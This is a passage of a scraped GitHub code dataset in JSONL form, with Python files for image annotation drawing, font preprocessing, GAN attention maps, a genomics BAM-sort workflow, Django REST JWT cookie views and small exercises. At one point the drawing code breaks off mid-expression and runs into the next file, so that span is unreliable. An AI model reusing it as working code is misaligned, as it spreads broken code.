item:DatasetItem, categories:LabelCategories) -> None:\n self.item = item\n self.lineStyles = ['(d)ot', '(s)olid']\n self.conerStyles = ['(s)harp', '(r)ound']\n self.categories = categories\n self.img = item.image.data\n self.fontscale = max(self.img.shape[:2]*np.array([30/1080, 30/1620]))\n self.thick = int(max([*list(self.img.shape[:2]*np.array([2/1080, 2/1620])),2]))\n self.root = Path(item.image.path[:item.image.path.rfind(item.id)]).parent\n\n def setLabelName(self):\n for anno in self.item.annotations:\n setattr(anno, 'labelName', self.categories[anno.label].name)\n\n def saveImg(self, savePath:Path=None):\n img = self.chgImageOrder(self.img)\n img = Image.fromarray(img.astype(np.uint8))\n imgPath = Path(self.item.id+self.item.image.ext)\n if savePath is None:\n savePath:Path = self.root/'images_draw-label'/imgPath\n savePath.parent.mkdir(exist_ok=True, parents=True)\n img.save(savePath)\n return self\n\n def drawItem(self, lineStyle, cornerStyle):\n for anno in self.item.annotations:\n if isinstance(anno,Bbox):\n self.drawBbox(anno, lineStyle, cornerStyle).drawLabel(anno)\n elif isinstance(anno,Polygon):\n self.drawSeg()\n return self\n\n @staticmethod\n def chgImageOrder(inputImg):\n '''\n RGB to BGR or BGR to RGB\n '''\n img = deepcopy(inputImg)\n if 
len(img.shape) == 3 and img.shape[2] in {3, 4}:\n img[:, :, :3] = img[:, :, 2::-1]\n return img\n\n @staticmethod\n def getColor(anno:Union[Bbox,Polygon], order='BGR'):\n color = customDataset.ImageData.colorMap[anno.label]\n while len(customDataset.ImageData.colorMap) != len(set(customDataset.ImageData.colorMap.values())):\n del customDataset.ImageData.colorMap[anno.label]\n color = customDataset.ImageData.colorMap[anno.label]\n if order=='BGR':\n return color[::-1]\n elif order=='RGB':\n return color\n else:\n raise AssertionError(f'order 인수를 바르게 입력하세요. 현재 입력={order}')\n\n def drawBbox(self, anno:Bbox, lineStyle, cornerStyle):\n color = self.getColor(anno, 'BGR')\n bbox = [int(i) for i in anno.points]\n if cornerStyle=='r': #round\n self.roundRectangle(self.img,(bbox[0], bbox[1]), (bbox[2], bbox[3]), color, self.thick, linestyle=lineStyle)\n elif cornerStyle=='s': #sharp\n self.rectangle(self.img, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color, self.thick, linestyle=lineStyle)\n else:\n raise AssertionError(f'cornerStyle must be one of {\", \".join(self.conerStyles)}')\n return self\n\n def rectangle(self, img, topleft, bottomright, color, thick, linestyle='solid'):\n if linestyle=='s': #solid\n cv2.rectangle(img, (topleft[0], topleft[1]), (bottomright[0], bottomright[1]), color, thick)\n elif linestyle=='d': #dot\n self.dotLine(img, topleft, (bottomright[0], topleft[1]), color, thick)#top\n self.dotLine(img, (topleft[0],bottomright[1]), (bottomright[0], bottomright[1]), color, thick)#bottom\n self.dotLine(img, topleft, (topleft[0], bottomright[1]), color, thick)#left\n self.dotLine(img, (bottomright[0],topleft[1]), (bottomright[0],bottomright[1]), color, thick)#right\n return self\n \n def roundRectangle(self, img, topleft, bottomright, color, thick, linestyle='solid'):\n if linestyle=='s': #solid\n _line, _ellipsis = cv2.line, cv2.ellipse\n elif linestyle=='d': #dot\n _line, _ellipsis = self.dotLine, self.dotEllipse\n else:\n raise AssertionError(f'linestyle must be one of {\", \".join(self.lineStyles)}')\n\n border_radius = thick*20\n b_h, b_w = int((bottomright[1]-topleft[1])/2), int((bottomright[0]-topleft[0])/2)\n r_y, r_x = min(border_radius,b_h), min(border_radius,b_w)\n\n _line(img, topleft, (bottomright[0]-r_x, topleft[1]), color, thick)#top\n _line(img, (topleft[0]+r_x,bottomright[1]), (bottomright[0]-r_x, bottomright[1]), color, thick)#bottom\n _line(img, topleft, (topleft[0], bottomright[1]-r_y), color, thick)#left\n _line(img, (bottomright[0],topleft[1]+r_y), (bottomright[0],bottomright[1]-r_y), color, thick)#right\n _ellipsis(img, (bottomright[0]-r_x, topleft[1]+r_y), (r_x, r_y), 0, 0, -90, color, thick)#top-right\n _ellipsis(img, (topleft[0]+r_x, bottomright[1]-r_y), (r_x, r_y), 0, 90, 180, color, thick)#bottom-left\n _ellipsis(img, (bottomright[0]-r_x, bottomright[1]-r_y), (r_x, r_y), 0, 0, 90, color, thick)#bottom-right\n return self\n\n @staticmethod\n def dotEllipse(img, center, r, rotation, start, end, color, thick):\n dr = int((end-start)/4.5)\n\n start1 = start\n while np.sign(end-start1)==np.sign(dr):\n end1 = start1+dr\n if np.abs(end-start1)< np.abs(dr):\n end1=end\n cv2.ellipse(img, center, r, rotation, start1, end1, color, thick)\n start1 += 2*dr\n\n @staticmethod\n def dotLine(img, topleft, bottomright, color, thick):\n a = np.sqrt((bottomright[0]-topleft[0])**2+(bottomright[1]-topleft[1])**2)\n if a==0:\n return\n dotgap = thick*10\n b = a/dotgap\n dx = int((bottomright[0]-topleft[0])/b)\n dy = int((bottomright[1]-topleft[1])/b)\n\n x1, y1 = topleft\n while 
(np.sign(bottomright[0]-x1)==np.sign(dx)) & (np.sign(bottomright[1]-y1)==np.sign(dy)):\n end_x = x1+dx\n end_y = y1+dy\n\n if np.abs(bottomright[0]-end_x) NumPy Array by font\ndef generate_font_bitmaps(chars, font_path, char_size, canvas_size, x_offset, y_offset):\n font_obj = ImageFont.truetype(font_path, char_size)\n bitmaps = list()\n for c in chars:\n bm = draw_char_bitmap(c, font_obj, canvas_size, x_offset, y_offset)\n bitmaps.append(bm)\n return np.array(bitmaps)\n\n\n# NumPy Array -> img\ndef render_fonts_image(x, path, img_per_row):\n num_imgs, w, h = x.shape\n side = int(w)\n width = img_per_row * side\n height = int(np.ceil(float(num_imgs) / img_per_row)) * side\n canvas = np.zeros(shape=(height, width), dtype=np.int16)\n for idx, bm in enumerate(bitmaps):\n x = side * int(idx / img_per_row)\n y = side * int(idx % img_per_row)\n canvas[x: x + side, y: y + side] = bm\n misc.toimage(canvas).save(path)\n return path\n\n\n#Processes a font into a NumPy Format\ndef process_font(chars,font_path,save_path,x_offset = 0,y_offset = 0,mode='target'):\n char_size = 64\n canvas = 80\n if mode == \"source\":\n char_size = char_size * 2\n canvas = canvas * 2\n font_bitmaps = generate_font_bitmaps(chars,font_path,char_size,canvas,x_offset,y_offset)\n _, ext = os.path.splitext(font_path)\n if not ext.lower() in [\".otf\", \".ttf\"]:\n raise RuntimeError(\"unknown font type found %s. only TrueType or OpenType is supported\" % ext)\n _, tail = os.path.split(font_path)\n font_name = \".\".join(tail.split(\".\")[:-1])\n bitmap_path = os.path.join(save_path, \"%s.npy\" % font_name)\n np.save(bitmap_path, font_bitmaps)\n\n\n#Textfile containing characters -> an array of characters\ndef get_chars(path):\n chars = list()\n with open(path) as f:\n for line in f:\n line = \"%s\" %line\n char = line.split()[0]\n chars.append(char)\n return chars\n\n\n#bitmaps = generate_font_bitmaps(chars, font_path, 64, 80, 0, 0)\n#render_fonts_image(bitmaps, './t4.png', 9)\n\n# read from txt file, get a list of characters in UTF8 form\nchars = get_chars('./charsets/top_3000_simplified.txt')\nsave_dir = \"npy_for_matlab\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source_font',type = str, default = None,\n help = 'numpy bitmap for source font')\n parser.add_argument('--target_font',type = str,default = None,\n help = 'numpy bitmap for target font')\n FLAGS = parser.parse_args()\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n if FLAGS.source_font:\n process_font(chars,FLAGS.source_font,save_dir,0,0,mode = 'source')\n elif FLAGS.target_font:\n process_font(chars,FLAGS.target_font,save_dir,0,0,mode = 'target')\n\n\n","repo_name":"dengl11/Chinese-Font-Reconstruction","sub_path":"3_TensorFlow/pre-process2.py","file_name":"pre-process2.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"6727514346","text":"\"\"\"\r\nThis file runs the main training/val loop\r\n\"\"\"\r\nimport os\r\nimport json\r\nimport sys\r\nimport pprint\r\nimport torch\r\n\r\nsys.path.append(\".\")\r\nsys.path.append(\"..\")\r\n\r\nfrom options.train_options import TrainOptions\r\nfrom models.psp import pSp\r\nfrom models.psp_gansformer import pSpGansformer\r\nfrom configs import data_configs, transforms_config\r\nfrom datasets.images_dataset import ImagesDataset\r\nfrom models.gansformer.training import misc\r\n\r\n\r\ndef main():\r\n\topts = 
TrainOptions().parse()\r\n\tos.makedirs(opts.exp_dir, exist_ok=True)\r\n\tos.makedirs(opts.exp_dir+\"_out\", exist_ok=True)\r\n\r\n\topts_dict = vars(opts)\r\n\tpprint.pprint(opts_dict)\r\n\r\n\tdevice = opts.device\r\n\r\n\tnet = pSp(opts)\r\n\tnet = net.to(device)\r\n\r\n\tdata = configure_data(opts)\r\n\r\n\tpattern = \"{}_out/{{}}-{{}}.png\".format(opts.exp_dir) \r\n\tfor d in data:\r\n\t\timg = d[0].unsqueeze(0).to(device)\r\n\t\tatt_maps = net.forward(img, return_att=True)\r\n\t\tfor i,att_map in enumerate(att_maps):\r\n\t\t\tatt_map = torch.nn.functional.softmax(att_map, dim=2)\r\n\t\t\tfor j,style_att in enumerate(torch.split(att_map, 1, dim=2)):\r\n\t\t\t\tstyle_att = (style_att - torch.mean(style_att)) / torch.std(style_att)\r\n\t\t\t\tout = style_att.reshape(int(style_att.shape[3]**0.5), int(style_att.shape[3]**0.5)).cpu().detach().numpy()\r\n\t\t\t\tmisc.to_pil(out).save(pattern.format(i,j))\r\n\r\n\tprint(\"done\")\r\n\r\n\r\ndef configure_data(opts):\r\n\tif opts.dataset_type not in data_configs.DATASETS.keys():\r\n\t\tException(f'{self.opts.dataset_type} is not a valid dataset_type')\r\n\r\n\tdataset_args = data_configs.DATASETS[opts.dataset_type]\r\n\ttransforms_dict = transforms_config.EncodeTransforms(opts).get_transforms()\r\n\tdata = ImagesDataset(source_root=opts.exp_dir,\r\n\t\t\t\t\t\t\t\t\ttarget_root=opts.exp_dir,\r\n\t\t\t\t\t\t\t\t\tsource_transform=transforms_dict['transform_source'],\r\n\t\t\t\t\t\t\t\t\ttarget_transform=transforms_dict['transform_test'],\r\n\t\t\t\t\t\t\t\t\topts=opts)\r\n\treturn data\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n# python scripts/attention_maps.py --dataset_type=ffhq_encode --encoder_type=GradualStyleEncoder --use_attention --exp_dir=experiment/att_maps --start_from_latent_avg --input_nc=3 --output_size=256 --checkpoint_path=experiment/psp_stylegan_attention_ffhq_encode7/checkpoints/best_model.pt","repo_name":"shashankmanjunath/ec523_project","sub_path":"gan_inversion/scripts/attention_maps.py","file_name":"attention_maps.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16734779793","text":"myFile = open(\"input.txt\", 'r')\nmyList = []\nfor myLine in myFile:\n\tmyLine = int(myLine.strip())\n\tmyList.append((myLine // 3) - 2)\nmyFile.close()\nmyFile2 = open(\"output.txt\", 'w')\nsum = 0\nfor myLine in myList:\n\tsum += myLine\n\tmyFile2.write(str(myLine) + '\\n')\nmyFile2.close()\nprint(sum)","repo_name":"jpieczar/Advent-of-code-2019","sub_path":"day-01/part-01.py","file_name":"part-01.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15627161599","text":"# encoding: utf-8\nimport os\n\nfrom gaeautils.bundle import bundle\nfrom gaeautils.workflow import Workflow\n\n\nclass bamSort(Workflow):\n \"\"\" bamSort \"\"\"\n\n INIT = bundle(bamSort=bundle())\n INIT.bamSort.program = \"hadoop-bam-x.7.0.jar\"\n INIT.bamSort.picard = \"picard.x.1.jar\"\n INIT.bamSort.index_program = ''\n INIT.bamSort.output_format = 'file'\n INIT.bamSort.reducer_num = 0\n # INIT.bamSort.bamindex = False\n \n \n def run(self, impl, dependList):\n impl.log.info(\"step: bamSort!\")\n inputInfo = self.results[dependList[0]].output\n result = bundle(output=bundle(),script=bundle())\n \n #extend program path\n self.bamSort.program = self.expath('bamSort.program')\n self.bamSort.picard = self.expath('bamSort.picard')\n self.bamSort.index_program 
= self.expath('bamSort.index_program', False)\n\n hadoop_parameter = ''\n if self.hadoop.get('queue'):\n hadoop_parameter += '-D mapreduce.job.queuename={} '.format(self.hadoop.queue)\n hadoop_parameter += '-libjars {} '.format(self.bamSort.picard)\n\n reducer = self.hadoop.reducer_num\n redeuce_per_node = 10\n reducer = int(int(self.hadoop.reducer_num)/redeuce_per_node)\n if self.option.multiSample:\n # if self.hadoop.is_at_TH:\n # redeuce_per_node = 5\n if redeuce_per_node > len(self.sample):\n redeuce_per_node = len(self.sample)\n reducer = int(int(self.hadoop.reducer_num)/redeuce_per_node)\n if self.bamSort.reducer_num > 0:\n reducer = int(self.bamSort.reducer_num)\n \n #global param\n ParamDict = {\n \"PROGRAM\": \"%s jar %s %s\" % (self.hadoop.bin, self.bamSort.program, hadoop_parameter),\n \"REDUCERNUM\":reducer\n }\n\n #script template \n fs_cmd = self.fs_cmd\n cmd = []\n cmd.append(\"%s ${HDFSTMP}\" % fs_cmd.delete)\n cmd.append(\"allparts=\")\n cmd.append(\"%s ${INPUT}/part* |awk '{print $%d}' > ${BAMLIST}\" % (fs_cmd.ls, (not self.hadoop.ishadoop2 and self.hadoop.is_at_TH) and 9 or 8))\n cmd.append('for i in `cat ${BAMLIST}`;do allparts=\"${allparts} $i\";done')\n cmd.append(\"${PROGRAM} sort -F BAM -o ${OUTDIR} --reducers ${REDUCERNUM} ${HDFSTMP} ${allparts} \")\n\n if self.option.multiSample:\n outdir= impl.mkdir(self.option.workdir,\"alignment\",self.option.multiSampleName)\n for sample_name in self.sample:\n bam = os.path.join(outdir,\"%s.sorted.bam\" % sample_name)\n if self.bamSort.get('index_program'):\n #cmd.append('if [ ! -e {}.bai ]\\nthen'.format(bam))\n cmd.append('{} index {}'.format(self.bamSort.index_program, bam))\n #cmd.append('fi')\n result.output[sample_name] = bam\n else:\n if self.bamSort.get('index_program'):\n #cmd.append('if [ ! 
-e ${OUTPUT}.bai ]\\nthen')\n cmd.append('%s index ${OUTPUT} -t 12' % self.bamSort.index_program)\n #cmd.append('fi')\n \n JobParamList = []\n for sampleName in inputInfo:\n hdfs_tmp = os.path.join(self.option.dirHDFS,sampleName,'tmp')\n tmp = impl.mkdir(self.option.workdir,\"temp\",sampleName)\n scriptsdir = impl.mkdir(self.gaeaScriptsDir,sampleName)\n outdir= impl.mkdir(self.option.workdir,\"alignment\",sampleName)\n \n if not self.option.multiSample:\n result.output[sampleName] = os.path.join(outdir,\"%s.sorted.bam\" % sampleName)\n\n #global param\n JobParamList.append({\n \"SAMPLE\" : sampleName,\n \"SCRDIR\" : scriptsdir,\n \"INPUT\": inputInfo[sampleName],\n \"OUTPUT\": result.output[sampleName] if not self.option.multiSample else '',\n \"OUTDIR\": 'file://%s' % outdir,\n \"BAMLIST\": os.path.join(tmp,\"hadoop_bam.list\"),\n \"HDFSTMP\":hdfs_tmp\n })\n \n \n #write script\n scriptPath = \\\n impl.write_scripts(\n name = 'bamSort',\n commands=cmd,\n JobParamList=JobParamList,\n paramDict=ParamDict)\n \n #result\n result.script.update(scriptPath) \n return result\n","repo_name":"jjmini/dmcade","sub_path":"Python/GaeaPipeline/workflow/H_bamSort.py","file_name":"H_bamSort.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16274789794","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#### File: Contains Functions Necessary To Calculate Similarity Distribution\n\n# Import necessary libraries\nfrom jaccard_index import *\nfrom edit_distance import *\n\n### Getting Similarity of Nodes (In A Graph)\n\ndef getNodeSimilarityDistribution(num_nodes, num_edges): \n dg = makeDirectedGraph(num_nodes, num_edges)\n \n similarity_data = getSimilarityData(dg)\n clique_data = getCliqueData(dg) \n similarity_data.update(clique_data)\n \n return pd.DataFrame(data = similarity_data)\n\n\n\n### Getting Similarity of Nodes for Multiple Graphs\n\ndef getGraphSimilarityList(num_graphs, num_nodes, num_edges): \n graph_sim_list = []\n \n for i in range(num_graphs):\n node_sim = getNodeSimilarityDistribution(num_nodes, num_edges)\n graph_sim_list.append(node_sim)\n \n return graph_sim_list\n\n\n## Helper Functions\n\ndef getSimilarityData(gm):\n node_list = list(gm.nodes)\n node_pairs = list(it.combinations(node_list, 2))\n\n ed_imm_sim, ed_full_sim, ji_sim = [], [], []\n\n for pair in node_pairs:\n ed_imm_sim.append(get_immediate_similarity(gm, pair[0], pair[1]))\n ed_imm_sim.append(get_immediate_similarity(gm, pair[1], pair[0]))\n\n ed_full_sim.append(get_full_similarity(gm, pair[0], pair[1]))\n ed_full_sim.append(get_full_similarity(gm, pair[1], pair[0]))\n\n ji_sim.append(calculate_similarity(gm, pair[0], pair[1]))\n ji_sim.append(calculate_similarity(gm, pair[1], pair[0]))\n\n similarity_data = {\"Edit-Distance Immediate Similarity\": ed_imm_sim, \n \"Edit-Distance Full Similarity\": ed_full_sim,\n \"Jaccard Index Similarity\": ji_sim}\n \n return similarity_data\n\n\ndef getCliqueData(gm):\n node_list = list(gm.nodes)\n num_rows = len(list(it.combinations(node_list, 2))) * 2\n \n longest_max_indep_set = len(independent_set.maximum_independent_set(gm))\n max_cliques = list(clique.clique_removal(gm)[1]) * num_rows\n num_max_cliques = len(max_cliques)\n longest_max_clique = len(max_cliques[0])\n \n clique_data = {\"Longest Maximal Independent Set\": [longest_max_indep_set] * num_rows,\n \"Number of Maximal Cliques\": [num_max_cliques] * num_rows, \n \"Longest Maximal Clique\": [longest_max_clique] * 
num_rows}\n \n return clique_data\n\n\n\n### Creating Similarity Distribution of Graphs\n\ndef getGraphSummaryRow(graph_summary, column_list): \n graph_summary_row = []\n \n for column in column_list:\n graph_summary_row.append(graph_summary[column][\"mean\"])\n graph_summary_row.append(graph_summary[column][\"50%\"])\n graph_summary_row.append(graph_summary[column][\"std\"])\n \n return tuple(graph_summary_row)\n\n\ndef getCondensedSimilarityDistribution(graph_dist_list, column_list, metrics):\n cols = pd.MultiIndex.from_product([column_list, metrics])\n similarity_dist = pd.DataFrame(index = [\"Graph Number\"], columns = cols)\n \n index = 0\n for graph_similarity in graph_dist_list:\n graph_summary = graph_similarity.describe(include=\"all\")\n graph_summary_row = getGraphSummaryRow(graph_summary, column_list)\n \n similarity_dist.loc[index,:] = graph_summary_row\n index += 1\n \n return similarity_dist\n","repo_name":"nico-espinosadice/abductive-theory","sub_path":"Similarity Python Files/similarity_distribution.py","file_name":"similarity_distribution.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39704730206","text":"from rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework_simplejwt.views import (TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n TokenBlacklistView,\n )\nfrom .auth import CookieJWTAuthentication\n\nfrom rest_framework.permissions import (IsAuthenticated,\n AllowAny,\n )\n# from rest_framework.status import (HTTP_200_OK,\n# HTTP_201_CREATED,\n# HTTP_400_BAD_REQUEST,\n# HTTP_202_ACCEPTED,\n# HTTP_403_FORBIDDEN,\n# )\n# from rest_framework.filters import (BaseFilterBackend,\n# SearchFilter,\n# OrderingFilter,\n# )\n# # from .models import (User,\n# Supplier,\n# Collector,\n# Order,\n# TypeOfGoods,\n# RecyclePoint,\n# Address,\n# )\n\nfrom .mixin import (UserOperationsMixin,\n RatingOperationsMixin,\n OrderOperationsMixin,\n TypeOfGoodsOperationsMixin,\n RecyclePointOperationsMixin,\n FilteredOrderOperationsMixin,\n )\n\nfrom .serializers import (MyTokenObtainPairSerializer,\n CookieTokenRefreshSerializer,\n CookieTokenBlackListSerializer\n )\n\n# as we deployed to different domain we need to set samesite to 'none'\nCOOKIES_SET_SAME_SITE = 'none'\nCOOKIES_SET_SECURE = True\nCOOKIES_SET_HTTPONLY = True\n\n\nclass CreateUserAPI (UserOperationsMixin, GenericAPIView):\n \"\"\"\n Special class, with only post method.\n Allowed new user creates an account witout autentication\n \"\"\"\n authentication_classes = []\n permission_classes = (AllowAny,)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\nclass ListUserAPI (UserOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated, )\n pass\n\n\nclass RatingAPI(RatingOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass OrderAPI(OrderOperationsMixin, GenericViewSet):\n authentication_classes = []\n permission_classes = (AllowAny,)\n pass\n\n\nclass FilteredOrderAPI(FilteredOrderOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass TypeOfGoodsAPI(TypeOfGoodsOperationsMixin, GenericViewSet):\n 
authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n\nclass RecyclePointAPI(RecyclePointOperationsMixin, GenericViewSet):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated,)\n pass\n\n# Token autorzaion API\n\n\nclass CookieTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n if response.data.get('access'):\n response.set_cookie(\n 'access_token',\n response.data['access'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n response.data['refresh'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'user_info_token',\n f'{response.data[\"first_name\"]} {response.data[\"last_name\"]}',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n )\n del response.data['access']\n del response.data['refresh']\n return super().finalize_response(request, response, *args, **kwargs)\n\n\nclass CookieTokenRefreshView(TokenRefreshView):\n serializer_class = CookieTokenRefreshSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n if response.data.get('access'):\n response.set_cookie('access_token',\n response.data['access'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n response.data['refresh'],\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n del response.data['access']\n del response.data['refresh']\n return super().finalize_response(request, response, *args, **kwargs)\n\n\nclass CookieTokenVerifyView(TokenVerifyView):\n def post(self, request, *args, **kwargs):\n token = request.COOKIES.get('access_token')\n serializer = self.get_serializer(data={'token': token})\n serializer.is_valid(raise_exception=True)\n return Response({'detail': 'Token is valid'})\n\n\nclass CookieTokenBlacklistView(TokenBlacklistView):\n authentication_classes = [CookieJWTAuthentication, ]\n permission_classes = (IsAuthenticated, )\n\n serializer_class = CookieTokenBlackListSerializer\n\n def finalize_response(self, request, response, *args, **kwargs):\n print('from blacklisted', response.data)\n response.set_cookie('access_token',\n 'cookie_was_blacklisted',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'refresh_token',\n 'cookie_was_blacklisted',\n samesite=COOKIES_SET_SAME_SITE,\n secure=COOKIES_SET_SECURE,\n httponly=COOKIES_SET_HTTPONLY,\n )\n response.set_cookie(\n 'user_info_token',\n 'cookie_was_blacklisted',\n )\n return super().finalize_response(request, response, *args, **kwargs)\n","repo_name":"Chekinm/bottle-buddy","sub_path":"backend/drf_project_root/bottles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219208373","text":"from django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Prefetch\nfrom django.http import HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import 
action\nfrom rest_framework.response import Response\n\nfrom django_changeset.models import ChangeSet\n\nfrom eric.core.rest.viewsets import DeletableViewSetMixIn, ExportableViewSetMixIn\nfrom eric.dmp.models import Dmp, DmpForm, DmpFormData\nfrom eric.dmp.rest.filters import DmpFilter\nfrom eric.dmp.rest.serializers import DmpSerializerExtended\nfrom eric.projects.rest.serializers import ChangeSetSerializer\nfrom eric.projects.rest.viewsets.base import (\n BaseAuthenticatedCreateUpdateWithoutProjectModelViewSet,\n LockableViewSetMixIn,\n)\n\n\nclass DmpViewSet(\n BaseAuthenticatedCreateUpdateWithoutProjectModelViewSet,\n DeletableViewSetMixIn,\n ExportableViewSetMixIn,\n LockableViewSetMixIn,\n):\n \"\"\"Viewset for dmps\"\"\"\n\n serializer_class = DmpSerializerExtended\n filterset_class = DmpFilter\n search_fields = ()\n\n ordering_fields = (\n \"title\",\n \"dmp_form\",\n \"status\",\n \"created_at\",\n \"created_by\",\n \"last_modified_at\",\n \"last_modified_by\",\n )\n\n @action(detail=True, methods=[\"POST\"])\n def duplicate(self, request, format=None, *args, **kwargs):\n \"\"\"\n Duplicates the DMP with all its answers.\n \"\"\"\n dmp_object = Dmp.objects.viewable().get(pk=kwargs[\"pk\"])\n duplicate_metadata = request.data.get(\"duplicate_metadata\", False)\n\n # Duplicates the DMP and changes the name to \"Copy of\" + DMP title\n duplicated_dmp = dmp_object.duplicate(\n title=_(\"Copy of\") + f\" {dmp_object.title}\",\n status=Dmp.NEW,\n dmp_form=dmp_object.dmp_form,\n projects=dmp_object.projects.all().values_list(\"pk\", flat=True),\n metadata=dmp_object.metadata.all() if duplicate_metadata else None,\n old_dmp_pk=dmp_object.pk,\n )\n\n serializer = self.get_serializer(duplicated_dmp)\n\n return Response(serializer.data)\n\n def get_queryset(self):\n \"\"\"\n returns the queryset for DMP viewable objects,\n filtered by project primary key (optional)\n :return:\n \"\"\"\n return Dmp.objects.viewable().prefetch_related(\n \"changesets\",\n \"projects\",\n Prefetch(\"dmp_form\", queryset=DmpForm.objects.viewable()),\n Prefetch(\"dmp_form_data\", queryset=DmpFormData.objects.viewable()),\n )\n\n @action(detail=True, methods=[\"GET\"])\n def export(self, request, format=None, *args, **kwargs):\n \"\"\"Endpoint for the DMP Export\"\"\"\n if \"type\" in request.query_params:\n type = request.query_params[\"type\"]\n else:\n type = \"pdf\"\n\n if type == \"pdf\":\n return ExportableViewSetMixIn.export(self, request, *args, **kwargs)\n\n dmp_object = Dmp.objects.get(pk=kwargs[\"pk\"])\n dmp_form_data_objects = DmpFormData.objects.filter(dmp=dmp_object.pk)\n context = {\n \"dmp\": dmp_object,\n \"dmp_form_data\": dmp_form_data_objects,\n }\n\n if type == \"html\":\n filepath = \"export/export_html.html\"\n filename = \"dmpexport.html\"\n export = render_to_string(filepath, context)\n\n elif type == \"txt\":\n filepath = \"export/export_txt.txt\"\n filename = \"dmpexport.txt\"\n export = render_to_string(filepath, context).replace(\"\\n\", \"\\r\\n\")\n elif type == \"xml\":\n filepath = \"export/export_xml.xml\"\n filename = \"dmpexport.xml\"\n export = render_to_string(filepath, context)\n\n response = HttpResponse(export)\n response[\"Content-Disposition\"] = f'attachment; filename=\"{filename}\"'\n # Deactivate debug toolbar by setting content type != text/html\n response[\"Content-Type\"] = \"download;\"\n return response\n\n\nclass DmpChangeSetViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"Viewsets for changesets in dmps\"\"\"\n\n serializer_class = ChangeSetSerializer\n queryset 
= ChangeSet.objects.none()\n\n def get_queryset(self):\n return ChangeSet.objects.filter(object_type=ContentType.objects.get_for_model(Dmp))\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/dmp/rest/viewsets/dmps.py","file_name":"dmps.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"19066062841","text":"import unittest\nfrom . import run_doozer, get_working_dir\nimport os\n\n\nclass TestCleanup(unittest.TestCase):\n def test_cleanup(self):\n # to initialize working directory\n working_dir = get_working_dir()\n _, out, _ = run_doozer([\n \"--group=openshift-3.11\",\n \"config:get\"\n ])\n # doing cleanup\n _, out, _ = run_doozer([\n \"--group=openshift-3.11\",\n \"cleanup\"\n ])\n # ensure everyting except settings.yaml is cleaned up\n for f in os.listdir(working_dir):\n self.assertFalse(f != \"setting.yaml\", \"{} is not deleted.\".format(f))\n","repo_name":"openshift-eng/doozer","sub_path":"functional_tests/test_cleanup.py","file_name":"test_cleanup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"1194991422","text":"'''write a program that prints out the sine and cosine of\nthe angles ranging from 0 to 345 degrees in 15 degrees increments\neach result should be rounded to 4 decimal places\n'''\n#import sin and cosine -- trigonometry functions\nimport math\n\nfor i in range(0,350,15):\n #math.radians -- radians to degrees conversion\n x = math.sin(math.radians(i))\n y = math.cos(math.radians(i))\n print(i, round(x,4), round(y,4))\n","repo_name":"ErnieM02/Coding_3rdYear","sub_path":"MP_mathlab.py","file_name":"MP_mathlab.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 